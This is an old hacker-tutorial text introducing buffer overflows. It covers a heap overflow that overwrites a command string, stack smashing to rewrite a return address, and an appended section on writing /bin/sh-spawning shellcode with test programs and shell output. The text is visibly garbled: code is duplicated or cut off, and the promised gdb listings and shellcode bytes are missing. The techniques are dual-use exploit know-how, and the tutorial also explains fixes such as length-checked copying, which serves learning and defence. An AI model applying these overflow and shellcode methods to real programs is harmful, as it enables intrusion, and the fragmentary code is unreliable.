BufferOverflow
BufferOverflow
Intro
Hello, here I am again, this time I'll let you know what is in fact buffer overflow and how
you can detect if some program is vulnerable to buffer overflow exploits. This tutorial
has C source code, so if you don't know C you can have some problems in this tutorial,
you also need to have some notions on ASM and how to use gdb.
I tried to do the easiest I could, but still this tutorial isn't one of those where you really
don't know shit about nothing and when you end it you know all this. This one takes
some work to understand, hey it took huge work to write!
A little inside note, like everyone that is reading this lines I like to learn, so some weeks
ago I said to myself "Hey what the heck, why not to start reading some texts about buffer
overflows, I know how everything work but just superficially", so I just started learning
and now I'm trying to pass the knowledge that I gained, to everyone that is interested. So
this won't be one of those texts where you'll learn everything, this will be like a
walkthrough, like the title says an Introduction, (In the end I'll give you some nice texts).
If you have any questions concerning this tutorial post in our message board, if you find
any "bug" in this tutorial please email me and I'll correct it. Enjoy.
Exploit?
Well probably everyone knows what an exploit is. But you still got to see that the ones
that are entering the security world for the first time probably don't have the idea of what
that is, that's why I wrote this tinny section.
So for the ones that don't know an exploit is a program, usually written in C, that exploits
some problem that another program have. The exploit will allow you to run arbitrary
code that will let you do something that you shouldn't be able to do in your normal status
on the system.
Nowadays, most of the exploits are what we call Buffer Overflow Exploits. What's that
you ask. Wait because we'll get there. After all, this is the subject of this tutorial.
Another thing you should know is that everyone knows how to use them(how do you
think that most of the websites that are defaced?), the script kiddies just go to sites like
security focus, packetstorm or fyodor's exploit world, download it and run it, and then got
busted. But why doesn't everybody write exploits? Well the problem is that many people
doesn't know how to spot some vulnerability in the source code, or even if they can they
aren't able to write a exploit. So now that you have an idea of what an exploit is, let's go
ahead to the buffer overflow section.
A buffer overflow problem is based in the memory where the program stores it's data.
Why's that, you ask. Well because what buffer overflow do is overwrite expecific
memory places where should be something you want, that will make the program do
something that you want.
Well some of you right now are thinking "WOW, I know how buffer overflow works",
but you still don't know how to spot them.
Let's follow a program and try to find and fix the buffer overflow
char *somevar;
char *important;
char *somevar;
char *important;
somevar=(char *)malloc(sizeof(char)*4);
important=(char *)malloc(sizeof(char)*14);
Well we added 2 lines in the source code and left the rest unchanged. Let's see what does
two lines do.
The printf("%p\n%p", somevar, important); line will print the memory addresses for
somevar and important variables. The exit(0); will just keep the rest of the program
running after all you don't want it for nothing, your goal was to know where is the
variables are stored.
After running the program you would get an output like, you will probably not get the
same memory addresses:
0x8049700 <----- This is the address of somevar
0x8049710 <----- This is the address of important
As we can see, the important variable is next somevar, this will let us use our buffer
overflow skills, since somevar is got from argv[1]. Now, we know that one follow the
other, but let's check each memory address so we can have the precise notion of the data
storage. To do this let's re-write the code again.
char *somevar;
char *important;
char *temp; /* will need anothe r variable */
somevar=(char *)malloc(sizeof(char)*4);
important=(char *)malloc(sizeof(char)*14);
temp = somevar; /* this will put temp at the first memory address we want
*/
while(temp < important + 14) {
/* this loop will be broken when we get to the last memory address we
want, last memory address of important variable */
exit(0);
rest of code here
}
------ End Of partial Code ------
Now let's say that the argv[1] should be in normal use send. So you just type in your
prompt:
$ program_name send
0x8049700
0x8049710
0x8049700: s (0x616c62)
0x8049701: e (0x616c)
0x8049702: n (0x61) <---- each of this lines represent a memory address
0x8049703: d (0x0)
0x8049704: (0x0)
0x8049705: (0x0)
0x8049706: (0x0)
0x8049707: (0x0)
0x8049708: (0x0)
0x8049709: (0x19000000)
0x804970a: (0x190000)
0x804970b: (0x1900)
0x804970c: (0x19)
0x804970d: (0x63000000)
0x804970e: (0x6f630000)
0x804970f: (0x6d6f6300)
0x8049710: c (0x6d6d6f63)
0x8049711: o (0x616d6d6f)
0x8049712: m (0x6e616d6d)
0x8049713: m (0x646e616d)
0x8049714: a (0x646e61)
0x8049715: n (0x646e)
0x8049716: d (0x64)
0x8049717: (0x0)
0x8049718: (0x0)
0x8049719: (0x0)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
$
Nice isn't it? You can now see that there exist 12 memory address empty between
somevar and important. So let's say that you run the program with a command line like:
0x8049700
0x8049710
Starting To Print memory address:
0x8049700: s (0x646e6573)
0x8049701: e (0x2d646e65)
0x8049702: n (0x2d2d646e)
0x8049703: d (0x2d2d2d64)
0x8049704: - (0x2d2d2d2d)
0x8049705: - (0x2d2d2d2d)
0x8049706:- (0x2d2d2d2d)
0x8049707: - (0x2d2d2d2d)
0x8049708: - (0x2d2d2d2d)
0x8049709: - (0x2d2d2d2d)
0x804970a: - (0x2d2d2d2d)
0x804970b: - (0x2d2d2d2d)
0x804970c: - (0x2d2d2d2d)
0x804970d: - (0x6e2d2d2d)
0x804970e: - (0x656e2d2d)
0x804970f: - (0x77656e2d)
0x8049710: n (0x6377656e) <--- memory address where important variable starts
0x8049711: e (0x6f637765)
0x8049712: w (0x6d6f6377)
0x8049713: c (0x6d6d6f63)
0x8049714: o (0x616d6d6f)
0x8049715: m (0x6e616d6d)
0x8049716: m (0x646e616d)
0x8049717: a (0x646e61)
0x8049718: n (0x646e)
0x8049719: d (0x64)
0x804971a: (0x0)
0x804971b: (0x0)
0x804971c: (0x0)
0x804971d: (0x0)
Hey cool, newcommand got over command. Now it does something you want, instead of
something he was supposed to do.
NOTE: Reme mber sometimes those spaces between somevar and important can
have other variables instead of being empty, so check their values and send them to
the same address, or the program can crash before getting to the variable that you
modified.
Now let's think a little. Why does this happen? As you can see in the source code
somevar is declared before important, this will make, most of the times, that somevar will
be first in memory. Now, let's check how each one is got. Somevar gets it's value from
argv[1], and important gets it from strcpy() function, but the real problem is that
important value is assign first so when you assign value to somevar that is before it
important can be overwritten. This program could be patched against this buffer overflow
switching those two lines, becoming :
strcpy(somevar, argv[1]);
strcpy(important, "command");
If this was the way that the program was done even if you give an argument that would
get into the memory address of important, it will be overwritten by the true command,
since after getting somevar, is assign the value command to important.
This kind of buffer overflow, is a heap buffer overflow. Like you probably has seen they
are really easy to do in theory but, in the real world, it's not really easy to do them, after
all the example I gave was a really dumb program right? It's a real pain in the ass to find
those important variables, and also to overflow that variable you need to be able to write
to one that is in a lower memory address, most of times all this conditions doesn't get
together, that's why we are now gonna talk about stack buffer overflows.
Just a little inside note: In the last paragraph I talked about heap and stack. You
probably be wondering what each one is. So here's a brief and easy of
understanding definition of each one:
heap - is the space that you reserve for a variable (you access heap when you use
malloc() function).
stack - it's the place where is pushed or returned values from a function. When you are
trying to overflow the stack you' ll try to change the return address, making the code to
jump some place in memory where you have put commands that you want to execute.
So let's get into the stack stuff. Here starts the part that most problems gave me and still
give. Here we will need to know ASM, know how to handle with gdb (believe me it will
start being one of your best friends), still don't give up.
We will talk in Smashing the Stack which consists in a kind of "attack" that will change
the return address(RET). Doing this you can retur n the function to an address where you
already had allocate some commands that you want to be executed.
exploit(char *this) {
char string[20];
strcpy(string,this);
printf("%s\n", string);
}
main(int argc, char *argv[]) {
exploit(argv[1]);
}
Now we will try to call two times the exploit() functions. How we will do this? Well first
we need to find some nice addresses. This time let's use gdb. First we compile.
This is your prompt now we will disassemble main. To do this we just need to type
disassemble (you can also type disas) main hard isn't it?
Some thinking
As we can see exploit is called at 0x804845c and itself has 0x8048410 as its address.
Back to gdb
-----------
First you are probably wondering what's x/3bc command is. Well this is the command
that let us examine memory.
x/3bc
^^^
|||--- chars
|| --- Binary
|----- define 3 as range
I did it because I was wondering what was being pushed into the stack at 0x80484cc , and
as you can see is the string we want to print.
Our Goal
}
Doing this we will re-write the Return address for 0x0804844c returning the functions to
the call exploit again. This will put us in a endless loop. Why we could exploit this
program? Well because there was no checking in the length of the string we were
sending. So here's an advice if you code something that needs to be secure, always use
functions that do length checking, like fgets(), strncpy() instead of gets(), strcpy(), and so
on.
gdb tip
Wanna see how an exploit affects the vunerable program. Enter in gdb and type.
Then you can see what the exploit does, and correct the problems if you are having any.
Final Suggestions
Well we reached the final. Hope this was some help for you... I have in my mind some
"upgrades" in this tutorial, since it hasn't everything I wanted to say. But I think it's better
to check everything I want to say, instead of saying something that I'm not 100% sure.
If you find something in this tutorial that don't match, please feel free to email me about
it.
Reading Suggestions
This 3 texts will give you a huge amount of info that you can need. They helped me...
They can be found at packetstorm.securify.com
This appendix was written for a friend, Predator, which i gratefully thank for his efforts.
Original text is below.
Regards
mailto:[email protected]
ICQ#: 46043882
I wrote this as part of Ghost Rider buffer overflow tutorial which you can download at
http://blacksun.box.sk
Author: predator
mailto: [email protected]
date : 26/07/2000
Shell code
Now I will talk about shell code.Shell code is a char array which consist in machine
instruction which are used to spawn shell.Since the program we try exploit doesn't have
code which will execute shell,we must write it. For this, you must know a little of
assembly,C and x86 structure, Linux is also required. But only C and assembly are really
needed. Well lets start with it.
1. Shell code
Usually shell code is written in program as ->
1) char c0de[]={0x90,0x90...};
2) char c0de[]="\x90\x90...";
This program is used to run shell.Why execve if there is a lot of exec function.The
answer is simple execve is only exec function that is call with int $0x80 and which is
very important to us.
well lets compile this with -static option and run it in gdb.
Things to do->
Well we need the exact address in memory of our "/bin/sh" string. We can simple put
"/bin/sh" after call which will push EIP on stack,and pushed EIP should be address of our
string...Look at pic 0.1
[JJaaaaaaaaaaaaaaaaaaaaaaaaCCssssss]
|^_______________________^|
|________________________|
on beginning of code we will put JMP instruction which will jmp to call,and call will
save EIP and go to offset of a.EIP will be our "/bin/sh" address
int main(){
char buf[5];
long *ret=(long *)(buf+12);
*ret=(long)c0de;
}
--------------- shell2.cpp Code Ends Here ------------------
root@scorpion#cc shell2.cpp -o shell2
root@scorpion#./shell2
sh-2.03
rewrite program:
void main(){
char buf[5];
long *ret=(long *)(buf+12);
*ret=(long)c0de;
}
-------------- shell4.cpp Code Ends Here ----------------
compile shell4.cpp
root@scorpion#cc shell4.cpp -o shell4
root@scorpion#./shell4
sh-2.03#
It works...and it is smaller then our previous c0de and without 0x00 or \x00 or '\0' so
strcpy(),sprintf() will copy it at all...
void main(){
printf(" Stack pointer is 0x%x%\n",get_esp());
}
------- sp.cpp Code Ends Here-----------
root@scorpion#cc sp.cpp -o sp
root@scoprion#./sp
Stack pointer is 0xbffff910 <--- your output will be other address or same
root@scorpion#